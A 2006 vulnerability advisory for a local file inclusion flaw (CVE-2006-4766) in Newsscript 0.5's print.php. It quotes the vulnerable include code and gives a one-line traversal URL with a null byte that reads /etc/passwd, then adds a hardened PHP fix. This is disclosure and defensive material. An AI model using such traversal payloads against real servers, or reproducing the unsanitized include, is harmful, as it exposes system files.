Newsscript version 0.5 (print.php) Local File Inclusion Vulnerability


Published: 2006.09.19
Credit: Daftrix
Risk: Medium
CWE: N/A
CVE: CVE-2006-4766
Local: No
Remote: Yes

CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

# Subject:
--- "Newsscript version 0.5 (print.php) Local File Inclusion Vulnerability"
# Vulnerable version:
--- "Newsscript version 0.5"
# Vendor URL:
--- Email - mail (at) webmaster-journal (dot) com
--- Website - http://webmaster-journal.com
# Available in:
--- http://www.comscripts.com/scripts/php.wm-news.203.html

# Vulnerability:

--- Vulnerable code in print/print.php
--- The $ide variable is not sanitized and can be used to include files from local resources
--- <html>
--- <head>
--- <?
--- $file_name = "../".$ide.".txt";
--- ?>
--- [...]
--- include($file_name);

# Exploit:

--- http://localhost/newscript/print/print.php?ide=../../../../etc/passwd%00

# Discovered By:

--- Daftrix[at]Gmail.com

--- Daftrix Security Investigations

--- http://www.daftrix.com
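
A hardened form of the include shown above, as an added example that is not part of the original advisory or the Newsscript code base. It assumes article IDs are short names made of letters, digits, underscores and hyphens, that the .txt files sit one directory above print/, and that the articles are plain content; resolve_article_path() is a hypothetical helper name.

```php
<?php
// Added example, not Newsscript's own code. Assumptions: article IDs are
// short alphanumeric names and the .txt files live one directory above
// print/. resolve_article_path() is a hypothetical helper name.

function resolve_article_path($ide, $base_dir)
{
    // Accept strings only (rejects ide[]=...) and allow-list the characters:
    // '/', '\', '.' and NUL cannot pass, so "../" and a trailing %00 are refused.
    if (!is_string($ide) || !preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $ide)) {
        return null;
    }

    $base = realpath($base_dir);
    if ($base === false) {
        return null;
    }

    // Canonicalise and confirm the result is still inside the base directory
    // (defence in depth, e.g. against symlinks placed in the article folder).
    $path = realpath($base . DIRECTORY_SEPARATOR . $ide . '.txt');
    if ($path === false || !is_file($path)) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Read the parameter explicitly instead of using an implicitly populated $ide.
$ide  = isset($_GET['ide']) ? $_GET['ide'] : '';
$path = resolve_article_path($ide, __DIR__ . '/..');

if ($path === null) {
    header('HTTP/1.1 404 Not Found');
    exit('Article not found.');
}

// The article is data, not code: emit it with readfile() rather than
// include(), so any PHP inside the file is never executed.
readfile($path);
```

If the article files contain user-supplied text, escape it for HTML before output instead of sending it raw.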
